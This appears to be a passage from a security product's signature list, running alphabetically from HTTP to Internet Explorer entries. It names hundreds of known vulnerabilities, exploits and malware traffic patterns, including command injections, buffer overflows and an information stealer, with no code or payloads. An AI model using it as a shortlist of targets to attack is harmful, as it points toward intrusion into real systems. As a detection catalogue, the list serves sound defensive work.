HTTP-Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
HTTP-Performer-Pfdispaly-Cgi-File-Disclosure
HTTP-Phf-Cgi-Command-Execution-Vulnerability
HTTP-Phorum-Multiple-Php-Cross-Site
HTTP-Phorum-Register-Php-SQL-Injection
HTTP-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
HTTP-Php-Cgi-BOF
HTTP-Php-Cgi-File-Disclosure
HTTP-Php-Crlf-Fake-Header-Injection
HTTP-Php-Error-Logging-Format-Strigs-Vulnerability
HTTP-Php-Escapeshellcmd-Command-Execution
HTTP-Php-Function-Header-Injection
HTTP-Php-Fusion-Database-Backup-Disclosure
HTTP-Php-Globals-Parameter-Usage
HTTP-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability
HTTP-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise
HTTP-Php-Phpinfo-XSS
HTTP-Phpbb-Admin-Cash-Php-System-Compromise
HTTP-Phpbb-Viewtopic-Urldecode-System-Compromise
HTTP-PhpDig-Config-Php-System-Compromise
HTTP-PhpGedView-Admin-Php-Information-Disclosure
HTTP-PhpGedView-Change-Admin-Password
HTTP-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal
HTTP-PhpGedView-Login-Path-Disclosure
HTTP-PhpGedView-Search-Firstname-Cross-Site
HTTP-Phpmyadmin-Export-Php-Directory-Traversal
HTTP-Phpmyadmin-Grab-Globals-Lib-File-Disclosure
HTTP-Plusmail-Cmd-Exec
HTTP-Possible-Cross-Site-Scripting
HTTP-Publishing-Xpert-Err-Page-Path-File-Disclosure
HTTP-Py-Software-Active-Webcam-Webserver-Floppy-DoS
HTTP-RealPlayer-AVI-Parsing-Buffer-Overflow
HTTP-RealPlayer-RAM-File-Processing-Buffer-Overflow
HTTP-RealPlayer-Realpix-And-Realtext-Format-String-Compromise
HTTP-RealPlayer-SMIL-Screen-Size-System-Compromise
HTTP-Redirect-To-Non-HTTP-URI
HTTP-Request-Command-Execution
HTTP-Request-To-0.0.0.0
HTTP-Response-Splitting-XSS
HTTP-Roads-File-Disclosure-Vulnerability
HTTP-RodClark-sendform.cgi-Blurb-File-Disclosure
HTTP-Roundup-Directory-Traversal
HTTP-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF
HTTP-RSA-Authentication-Agent-For-Web-Redirect-BOF
HTTP-Safenet-License-Manger-UDP-Buffer-Overflow
HTTP-Samba-Swat-Authentication-Base64-BOF
HTTP-Sambar-Bat-Command-Execution-Vulnerability
HTTP-Sambar-Dumpenv-Pl-Information-Disclosure
HTTP-Sambar-Search-DLL-Directory-Disclosure
HTTP-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
HTTP-SAP-Internet-Transaction--Server-Information-Disclosure
HTTP-SAP-Internet-Transaction-Server-Wgate-DLL-Arbitrary-File-Disclosure
HTTP-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting
HTTP-SAP-Message-Srv-Server-Group-Parameter-BOF
HTTP-Serendipity-Exit-Php-SQL-Injection
HTTP-Sgi-Infosearch-Fname-Cmd-Exec
HTTP-Sgi-IRIX-Day5datacopier-Cgi-Authentication-Bypass
HTTP-Shopper-Cgi-Directory-Traversal
HTTP-SHOUTcast-Request-Format-String-System-Compromise
HTTP-SimpleBBS-Name-Argument-Remote-Code-Execution
HTTP-SimplestGuest-Command-Execution
HTTP-SiteUserMod-Cgi-Authentication-Bypass
HTTP-Snmppd-Syslog-Format-String-System-Compromise
HTTP-Sony-Xcp-Content-Protection-Software
HTTP-Sophos-Anti-Virus-CHM-File-Heap-Oveflow
HTTP-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection
HTTP-Squid-Authentication-Header-DoS
HTTP-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS
HTTP-Squid-Proxy-TRACE-Request-Remote-Denial-Of-Service
HTTP-Squid-Web-Proxy-HTTP-Request-Smuggling
HTTP-Stalkerlab-Mailers-File-Disclosure
HTTP-Subdreamer-Light-Global-Variables-SQL-Injection
HTTP-Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation
HTTP-Sun-Java-Runtime-Environment-Native-Methods-Memory-Corruption
HTTP-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow
HTTP-Sun-Java-WebStart-Jnlp-Buffer-Overflow
HTTP-SUSE-Apache-Cgi-Source-Disclosure
HTTP-SUSE-Linux-Enterprise-Server-Remote-Manager-Content-Length-BOF
HTTP-Sybase-EAServer-WebConsole-Buffer-Overflow
HTTP-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF
HTTP-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution
HTTP-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection
HTTP-Test-Cgi-Directory-Disclosure
HTTP-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass
HTTP-TRACE-Method-HTTP-Header-Information-Disclosure
HTTP-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow
HTTP-Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
HTTP-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow
HTTP-Trend-Micro-OfficeScan-Multiple-Cgi-Modules-Form-Processing-BOF
HTTP-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution
HTTP-TWiki-Rev-Parameter-Command-Execution
HTTP-VBulletin-Forum-Calendar-SQL-Injection
HTTP-VBulletin-Impex-Systempath-Code-Execution
HTTP-Verity-Ultraseek-Search-Path-Disclosure
HTTP-Vibechild-Directory-Manager-Edit-Image-Php-Vulnerability
HTTP-Viralator-Code-Execution
HTTP-ViRobot-Server-Addschup-Cookie-Buffer-Overflow
HTTP-Virtual-Vision-FTP-Pl-Directory-Traversal
HTTP-VitalSuite-System-Compromise
HTTP-W3who-DLL-Long-Query-BOF
HTTP-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow
HTTP-Web-Pals-Cgi-Vulnerability
HTTP-Webactive-Log-Information-Disclosure
HTTP-Webalizer-Cross-Site
HTTP-WebAPP-Apage-Command-Execution
HTTP-Webcart-File-Disclosure
HTTP-WebConnect-Wcp-User-Directory-Traversal
HTTP-Webgais-Cgi-System-Compromise
HTTP-WebHints-Command-Execution
HTTP-Websendmail-Cgi-System-Compromise
HTTP-Website-Uploader-Exe-File-Import
HTTP-Website-Win-C-Sample-Exe-BOF
HTTP-WebsitePro-Path-Disclosure
HTTP-Webstore-Ws-Mail-Cgi-System-Compromise
HTTP-Wguest-Rguest-Exe-File-Disclosure
HTTP-Whisker-Vulnerability-Scanner
HTTP-Whois-Raw-Cgi-System-Compromise
HTTP-Windmail-File-Disclosure
HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise
HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011
HTTP-Windows-Helpctr-Exe-Hcp-Url-System-Compromise
HTTP-Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow
HTTP-Windows-Media-Player-PNG-Processing-Integer-Overflow
HTTP-Winhlp32-Item-Buffer-Overflow
HTTP-WinZip-FileView-ActiveX-Control-Buffer-Overflow
HTTP-Word-Doc-Using-Ie
HTTP-WS-FTP-Pro-Ini-File-Weak-Encryption
HTTP-WWW-File-Share-Pro-Directory-Traversal
HTTP-WWWBoard-Password-Disclosure
HTTP-Xylogics-Annex-Ping-BOF
HTTP-Yahoo-Audio-Conferencing-ActiveX-Control-Buffer-Overflow
HTTP-Yahoo-Messenger-AudioConf-ActiveX-Control-Buffer-Overflow
HTTP-Yahoo-Messenger-YMailAttach-ActiveX-Buffer-Overflow
HTTP-Zeroboard-Dir-Parameter-Php-Code-Injection
HTTP-Zeroboard-Multiple-File-Disclosure
HTTP-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection
HTTP-ZmEu-Scanner
HTTP8080-RealServer-ViewSource-DoS
HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow
HTTPDX-TOLOG-Function-Format-String
Httper
HTTPS-Joost-Usage
HTTPS-Microsoft-Schannel-Security-Package-Compromise
HTTP_Akamai-Download-Manager-ActiveX-Buffer-Overflow
HTTP_Binary-In-User-Agent-String
HTTP_Cisco-Secure-Access-Control-Server-UCP-Application-CSuserCGI.exe-BOF
HTTP_CRL-Amadey-Bot-Infection-Traffic
HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174
HTTP_CSU-Apple-Software-Update-Catalog-Filename-Format-String
HTTP_CSU-RIG-EK-Traffic-Pattern
HTTP_FunWebProducts-mywebsearch
HTTP_GoAhead-Webserver-Deep-Path-Buffer-Overflow
HTTP_HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow
HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
HTTP_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
HTTP_IIS-Exair-DoS
HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
HTTP_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow
HTTP_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
HTTP_Microsoft-HTTP-Services-Authentication-Reflection
HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
HTTP_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
HTTP_Microsoft-Visual-Basic-6.0-Project-File-Handling-BOF
HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution
HTTP_MS09-036
HTTP_Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow
HTTP_Pacific-Poker
HTTP_Php-Strip-Tags-Bypass-Vulnerability
HTTP_Platrium-Weather-Service
HTTP_PopCap-Games
HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166
HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907
HTTP_Request-TRACE-2
HTTP_Response_Splitting
HTTP_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow
HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow
HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption
HTTP_Starware
HTTP_Sun-Java-Web-Start-Jnlp-File-Argument-Injection
HTTP_SupportSoft-Products-ActiveX-Control-Buffer-Overflow
HTTP_System-File-Access
HTTP_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow
HTTP_Wholesale-Directory-Toolbar
HTTP_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow
HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow
HTTP_Zango-Toolbar
Huawei-HG532n-Command-Injection
Huawei-HG866-Authentication-Bypass
Huawei-Router-HG532-Arbitrary-Command-Execution
Huawei-SOHO-Router-Information-Disclosure
Hulu-Online-Video-Service
Hummingbird-Inetd-Lpd-Component-Buffer-Overflow
HuntBar
Husdawg-System-Requirements-Lab-ActiveX-Unsafe-Method
Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow
Hyleos-ChemView-Buffer-Overflow
IA-Webmail-Server-HTTP-Get-Request-BOF
IAS-MS-CHAP-V2-Authentication-Bypass
IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write
IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986
IBM-BigFix-Relay-Servers-Information-Disclosure
IBM-Cognos-Buffer-Overflow
IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution
IBM-Data-Risk-Manager-Authentication-Bypass
IBM-Data-Risk-Manager-Path-Traversal
IBM-Data-Risk-Manager-Unathenticated-RCE
IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow
IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability
IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service
IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow
IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow
IBM-Director-Agent-DOS
IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service
IBM-Domino-Gif-Processing-Heap-Buffer-Overflow
IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow
IBM-Domino-IMAP-Mailbox-Name-Stack-Buffer-Overflow
IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow
IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow
IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow
IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal
IBM-Informix-Dynamic-Server-Command-Argument-Processing-Stack-Overflow
IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow
IBM-Informix-Dynamic-Server-Librpc.dll-Multiple-Buffer-Overflows
IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow
IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow
IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow
IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow
IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow
IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution
IBM-iNotes-ActiveX-Control-Integer-Overflow
IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach
IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach
IBM-Java-Multiple-Packages-Sandbox-Breach
IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow
IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow
IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow
IBM-Lotus-Domino-IMAP-Server-Buffer-Overflow
IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow
IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow
IBM-Lotus-Domino-LDAP-Server-Memory-Exception
IBM-Lotus-Domino-Mailto-Buffer-Overflow
IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow
IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service
IBM-Lotus-iNotes-Buffer-Overflow-Vulnerability
IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow
IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow
IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow
IBM-Lotus-Notes-Cross-Site-Scripting
IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow
IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow
IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow
IBM-Lotus-Notes-Url-Handler-Command-Execution
IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow
IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow
IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow
IBM-Lotus-Sametime-DoS
IBM-Lotus-Sametime-Information-Disclosure
IBM-Lotus-Sametime-Room-Name-BruteForce
IBM-Lotus-Sametime-User-Enumeration
IBM-Notes-PNG-Image-Parsing-Integer-Overflow
IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution
IBM-Operational-Decision-Manager-Datasource-JNDI-Injection
IBM-Qradar-Siem-Authentication-Bypass
IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization
IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution
IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure
IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure
IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass
IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities
IBM-solidDB-Denial-Of-Service
IBM-solidDB-Logging-Function-Format-String
IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service
IBM-solidDB-Rownum-Subquery-Denial-Of-Service
IBM-solidDB-Solid.exe-Authentication-Bypass
IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection
IBM-Spectrum-Protect-Plus-Hostname-Command-Injection
IBM-Spectrum-Protect-Plus-Timezone-Command-Injection
IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection
IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow
IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow
IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow
IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow
IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution
IBM-System-Director-Agent-DLL-Injection
IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow
IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS
IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection
IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-Buffer-Overflow
IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
IBM-Tivoli-Provisioning-Manager-OS-Deployment-Buffer-Overflow
IBM-Tivoli-Storage-Fastback-Server-Opcode-1335-Format-String-Vulnerability
IBM-Tivoli-Storage-Manager-Agent-Client-Generic-String-Handling-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Client-dsmagent.exe-NodeName-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service
IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution
IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929
IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vuln
IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal
IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection
IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection
IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow
IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow
IBM-TM1-Planning-Analytics-Remote-Code-Execution
IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow
IBM-WebSphere-Application-Server-Remote-Code-Execution
IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service
IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization
Icecast-Server-Base64-Authorization-Request-BOF
Icecast-Server-HTTP-Header-BOF
IcedID-Trojan-Infection-Traffic
Icingaweb-Directory-Traversal-In-Static-Library-File-Requests
ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification
ICMP-Connection-Reset-Denial-Of-Service
ICMP-DoS-Jolt-Vulnerability
ICMP-DoS-ZyXEL-Jolt-Vulnerability
ICMP-Microsoft-Windows-Kernel-ICMP-Fragmented-Packet-DOS
ICMP-Source-Quench-Denial-Of-Service
iCMS-admincp.php-SQL-Injection
ICONICS-Dialog-Wrapper-Module-ActiveX-Control-Buffer-Overflow
ICONICS-Genesis-Denial-of-Service
ICONICS-Genesis-Integer-Overflow
ICONICS-Modbus-DoS
ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability
Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961
ICQ-Instant-Messenger-Network-Usage
ICSCADA-SQL-Injection
IDAutomation-Barcode-ActiveX-Components-File-Write
Ie-Cross-Domain-Frame-Spoof
Ie-Object-Type-Property-BOF
IEPlugin
IGEL-OS-Secure-VNC-Terminal-Command-Injection
Ignite-Realtime-OpenFire-Admin-Console-Authentication-Bypass
Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting
Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery
Ignite-Realtime-OpenFire-Server-XSS
Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery
Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery
Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS
IGSS-DataServer-Denial-Of-Service
IGSS-ODBC-Server-Denial-Of-Service
IIS-Ftpd-Wildcard-Expansion-DoS
IIS-Iisadmpwd-DoS
IIS-Isapi-Windows-Media-Services-BOF-MS03-019
IIS-List-Argument-Heap-BOF
IIS-MS00-031-ISM-DLL-File-Disclosure
IIS-Newdsn-Exe-Vulnerability
IIS-RDS-Unsafe-Methods-Exposed
IIS-Showcode
IIS-Upload-File-Exploit
Illusion-Bot
IM-GAIM-ICQ-Protocol-Away-Message-BOF
IM2Net-Peer-To-Peer-Network-Usage
Imagemagick-Authenticate-Command-Injection
Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion
Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
Imagemagick-File-Deletion-Vulnerability
Imagemagick-File-Moving-Vulnerability
Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow
Imagemagick-HTTP_Request_Vulnerability
Imagemagick-Local-File-Read-Vulnerability
Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection
Imagemagick-PNG-Text-Profile-Arbitrary-File-Read
Imagemagick-PNG-Text-Profile-Denial-Of-Service
Imagemagick-Popen-Shell-Character-Filtering-Code-Execution
Imagemagick-Shell-Character-Filtering-Code-Execution
Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing
IMAP-Atrium-Software-Mercur-IMAPD-NTLMSSP-Command-Handling-Memory-Corruption
IMAP-Epost-Spa-Pro-Mail-Create-Buffer-Overflow
IMAP-Gnu-Mailutils-Command-Tag-Format-String-System-Compromise
IMAP-Gnu-Mailutils-IMap4d-Search-Compromise
IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Buffer-Overflow
IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Date-String-Stack-Overflow
IMAP-Ipswitch-IMail-Server-IMAP-Subscribe-Command-Stack-Buffer-Overflow
IMAP-Ipswitch-IMail-Server-List-Command-Denial-Of-Service
IMAP-Ipswitch-IMail-Web-Calendar-File-Disclosure
IMAP-Ipswitch-IMAP-Login-Command-Buffer-Overflow
IMAP-Ipswitch-IMAP-Lsub-Denial-Of-Service
IMAP-Ipswitch-IMAP-Select-Command-Denial-Of-Service
IMAP-Ipswitch-IMAP-Status-Command-Buffer-Overflow
IMAP-Ipswitch-Server-Fetch-Command-Buffer-Overflow
IMAP-Kerio-MailServer-Large-Literal-Octet-Counter-Denial-Of-Service
IMAP-Login-Buffer-Overflow
IMAP-MailEnable-IMAP-Command-Buffer-Overflow
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
IMAP-MailEnable-IMAP-Service-Invalid-Command-Buffer-Overflow
IMAP-MDaemon-Authenticate-Command-Buffer-Overflow
IMAP-Mercur-Messaging-IMAP-Service-Buffer-Overflow
IMAP-Microsoft-Exchange-Server-Literal-Processing-Buffer-Overflow
IMAP-Novell-NetMail-Buffer-Overflow
IMAP-Novell-NetMail-IMAP-Append-Command-Buffer-Overflow
IMAP-Novell-NetMail-IMAP-Verb-Literal-Heap-Overflow
IMAP-Novell-NetMail-Large-Literal-Octet-Counter-Buffer-Overflow
IMAP-Partial-Body-Buffer-Overflow
IMAP_MailEnable-IMAP-Service-Append-Command-Handling-Buffer-Overflow
IMAP_Mercury-Mail-Transport-System-IMAP-Data-Handling-Buffer-Overflow
iMatix-Corporation-Xitami-Web-Server-BOF
iMesh-Toolbar
Impacket-Generated-Traffic
Imperva-SecureSphere-Pws-Command-Injection
Includer-Command-Execution
Incredifind
Index-Request-Type
Indexing-Service-Memory-Corruption-CVE-2009-2507
Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization
Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass
Inductive-Automation-Ignition-Base64element-Insecure-Deserialization
Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization
Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting
Inductive-Automation-Ignition-Project-Deserialization
Inductive-Automation-Ignition-runQuery-Insecure-Deserialization
Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization
Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization
Indusoft-CEServer-Buffer-Overflow
Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow
Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF
Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow
Indusoft-Web-Studio-Remote-File-Access
Indusoft-Web-Studio-sDoS-Denial-Of-Service
Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations
Information-Stealer-Using-Fake-Captcha
Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow
Ingres-Database-Iidbms-Heap-Overflow
Ingres-Database-Iidbms-Heap-Overflow-3
Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow
Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1097
Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1098
Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1974
Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-24514
Insecure-Rc4-Cipher-Suite
Insecure-Root-Login
Insecure-X-Server-Allows-Sniffing
IntegraXOR-SQL-Injection
Intel-AMT-And-ISM-Privilege-Escalation-CVE-2020-8758
Intel-AMT-CVE-2017-5689
Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005
Intellian-Aptus-Web-OS-Command-Injection
Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE
IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow
Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow
Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676
Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
Internet-Explorer-And-HTTP-Services-Authentication-Reflection-Code-Execution
Internet-Explorer-ASLR-Bypass-CVE-2015-0069
Internet-Explorer-Cached-Objects-Zone-Bypass
Internet-Explorer-CDocument-Object-Use-After-Free
Internet-Explorer-Chtskdic.dll-Com-Object-Instantiation-Memory-Corruption
Internet-Explorer-Cross-Domain-Information-Disclosure
Internet-Explorer-CVE-2014-2795
Internet-Explorer-CVE-2014-2801
Internet-Explorer-DirectAnimation.DAUserData.Data-DoS
Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS
Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016
Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
Internet-Explorer-Domain-Url-Spoofing
Internet-Explorer-File-Name-Spoofing
Internet-Explorer-getElementById-JavaScript-For-Loop-DoS
Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS
Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261
Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019
Internet-Explorer-JPEG-Rendering-Memory-Corruption
Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow
Internet-Explorer-Malformed-Gif-File-Double-Free
Internet-Explorer-Memory-Corruption-CVE-2018-0870
Internet-Explorer-Memory-Corruption-CVE-2018-0988
Internet-Explorer-Memory-Corruption-CVE-2018-8249
Internet-Explorer-Memory-Corruption-CVE-2018-8267
Internet-Explorer-Memory-Corruption-CVE-2018-8447
Internet-Explorer-Memory-Corruption-CVE-2018-8461
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460
Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491
Internet-Explorer-MSHTML-CSS-Buffer-Overflow
